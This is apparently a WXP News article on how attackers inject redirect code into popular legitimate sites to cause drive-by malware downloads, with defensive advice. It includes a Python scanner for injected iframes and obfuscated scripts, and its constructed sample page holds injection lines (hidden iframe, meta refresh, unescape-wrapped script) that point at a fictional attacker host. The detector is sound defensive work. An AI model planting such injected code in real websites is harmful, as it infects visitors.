
Got Malware? Why Did You Get Malware from that (Trusted) Website? -- WXP News

You follow all the best security practices and heed all the warnings. You only visit web sites that are reputable or recommended by someone you trust. You never open unexpected attachments in email. You have a good anti-virus and anti-malware program installed. But somehow, you ended up with malware anyway. What happened?

The scary truth is that because of a shift in attacker tactics, today you can get malware from visiting any website, even one with an impeccable reputation. And the more popular the site is, the more likely this is to happen. It's an offshoot of an attack technique known as "SEO poisoning," and I just wrote a technical article about how it works, which will be published soon on the site. But you don't have to know the technical details to know that it puts all web surfers at risk.

One way to spread malware is to put up a web site that hosts the attack code, so that visitors become victims of "drive-by downloads": the page exploits an unpatched flaw in the browser or one of its plug-ins and installs software with no prompt and no click. But how does the attacker get people to visit the site? One way is to lure them there directly; for example, by manipulating search engine results so the malicious page ranks at the top for popular search terms. That's where the "SEO" (Search Engine Optimization) comes in.

But another way is to piggy-back on the popularity of legitimate sites. The attacker finds out which sites are being visited most and then exploits vulnerabilities in the web server's operating system or applications (typically an unpatched content-management system, plug-in or other server component) to insert redirection code, most often a hidden iframe or an obfuscated script, so that when web surfers visit that perfectly legitimate site, their browsers silently load the malware site (which may be designed to look just like the real one) and get a Trojan dumped onto their systems. Or the attacker may be able to implant the malicious code into the legitimate site itself. The site owner usually notices nothing, because the injected code is small and does not change how the page looks.
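To make the injected-redirect idea concrete, here is an added example (not from the WXP News article or its author) of the kind of check a site owner can run over a page's HTML to spot the tell-tale signs of such an injection: an iframe that is hidden or sized 1x1, a meta refresh or script that points at a host the site does not normally use, and inline script wrapped in unescape()/eval() obfuscation. The hostnames, the sample pages and the allow-list in it are all constructed for the example; a real run would feed it the HTML fetched from your own server.

```python
"""Added example: scan a page's HTML for injected redirection code.

Looks for the signs left by the attack described above: hidden iframes,
scripts or meta refreshes that pull from a host the site does not use, and
inline script obfuscated with unescape()/eval().  Standard library only;
the hostnames and the sample pages are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS tricks commonly used to keep an injected iframe out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(?:width|height)\s*:\s*0|left\s*:\s*-\d{3,}", re.I)

# Obfuscation idioms typical of injected loaders (not a complete list).
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|"
    r"document\.write\s*\(\s*unescape|(?:\\x[0-9a-f]{2}){8,}", re.I)


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one page."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        # Hosts the site legitimately loads content from (allow-list).
        self.allowed = {site_host, *allowed_hosts}
        self.findings = []
        self._in_script = False
        self._script_src = None

    def _foreign(self, url):
        host = urlparse(url or "").hostname
        return host is not None and host not in self.allowed

    def _add(self, kind, detail):
        if (kind, detail) not in self.findings:
            self.findings.append((kind, detail))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style", "")) or self._foreign(a.get("src")):
                self._add("hidden/foreign iframe", a.get("src", ""))
        elif tag == "script":
            self._in_script = True
            self._script_src = a.get("src")
            if self._script_src and self._foreign(self._script_src):
                self._add("foreign script", self._script_src)
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m and self._foreign(m.group(1)):
                self._add("meta refresh redirect", m.group(1))

    def handle_data(self, data):
        # Only inline script bodies are inspected; external files are judged by host above.
        if self._in_script and self._script_src is None and OBFUSCATION.search(data):
            self._add("obfuscated inline script", data.strip()[:60])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self._script_src = None


def scan_page(html, site_host, allowed_hosts=()):
    """Return a list of (kind, detail) indicators found in the page."""
    scanner = InjectionScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate news page after an injection (bad.example is fictional).
INFECTED_PAGE = """<html><head>
<meta http-equiv="refresh" content="0;url=http://bad.example/">
<script src="/js/site.js"></script>
<script src="https://cdn.example-partner.net/widget.js"></script>
</head><body>
<h1>Hot news story</h1>
<iframe src="http://bad.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://bad.example/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

# The same page as the site owner published it.
CLEAN_PAGE = """<html><head><script src="/js/site.js"></script>
<script src="https://cdn.example-partner.net/widget.js"></script></head>
<body><h1>Hot news story</h1><p>Nothing to see here.</p></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(INFECTED_PAGE, "news.example.com",
                                  allowed_hosts=("cdn.example-partner.net",)):
        print(f"{kind:28} {detail}")
```

Findings are indicators, not proof: a legitimate analytics or partner tag is also a "foreign script," which is why the allow-list exists. The point is that the site's owner, not the visitor, is in the best position to notice that a page has started loading content from a domain nobody on staff ever added.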

Because these attackers are looking to get the most "bang for their buck," they pick on the sites that are getting a lot of traffic. That could be a top news story, such as when a natural disaster occurs, a celebrity dies or is caught up in a scandal, or a hot product is released (the recent release of the iPad spawned many of these attacks). Or it could be a site that has a sudden surge in popularity because it's been listed on an aggregating service such as Digg - or listed as a "Fav Link" in a newsletter that has hundreds of thousands of subscribers, such as WXPnews.

I recently received several email messages from readers who said one of the recent links led them to a site that infested their computers with malware. We get the Fav Links from a variety of places - reader suggestions, friends, sites like Digg, web searches - and I check each one out first and scan my system afterward to make sure it doesn't contain malware. But that's obviously not good enough, because it's after a site becomes popular that it gets targeted by attackers. So if I publish a link to an obscure site and readers start going there, then it gets picked up by Digg, and so forth, it gets a large number of hits and comes to the attention of an attacker as an attractive target for a redirection attack. Then subsequent visitors get hit with the malware.

What's the solution? First, keep your operating system, web browser and browser plug-ins (PDF reader, Flash, Java and the like) fully patched, because a drive-by download works by exploiting a known, unpatched flaw in one of them; against a fully patched browser the exploit simply fails. Second, if you have good anti-virus and anti-malware programs and keep their definitions up to date, they should find and remove most of the bad stuff before it does much harm, though be aware that signature-based scanners lag behind freshly repacked Trojans by hours or days. Use the latest version of your web browser of choice and enable its security mechanisms, such as prompting before any download and disabling plug-ins you don't use. For extra safety, you could use Virtual Machine software such as Microsoft's Virtual PC, install the operating system of your choice in it and use the web browser in the VM when you visit sites that might not be absolutely trustworthy or that deal with very popular subjects of the moment.

Doing your browsing in a VM might seem a little paranoid, but it can be great for your peace of mind. You'll want to take all the same precautions (AV/anti-malware software, security settings, firewall, etc.) with the VM OS, but if malware does make it through anyway, it won't affect your primary (host) operating system and the applications installed on it. That's a form of "sandboxing": isolating a program that can pose a risk (in this case, the web browser) from everything else. Two caveats: the isolation only holds if you keep shared folders, drag-and-drop and clipboard sharing between guest and host turned off, and an infected guest stays infected, so take a snapshot of the clean VM and revert to it after any risky session rather than trusting the guest's own scanner to clean up.

If there's a moral to this story, it's that no web site is completely safe. Two years ago, a Symantec representative made the statement that "the hacking of legitimate web sites is the biggest threat today" and said the web was becoming the preferred platform for security attacks. And last year, a study from IBM concluded that visiting legitimate sites, such as those of your bank or your favorite online magazine, poses a growing danger.

What steps do you take to protect yourself from malware planted in legitimate web sites? Do you (or did you, before reading this) assume that "good" sites, run by reputable companies or persons, were automatically safe? Have you ever been the victim of malware distributed through a legitimate site or via redirection from a legit site? Do you think it's paranoid to do most of your web surfing in a VM, or even on a second physical computer that's dedicated just to that activity? Or is it just smart in light of today's sophisticated attackers? We invite you to discuss this topic in our forums at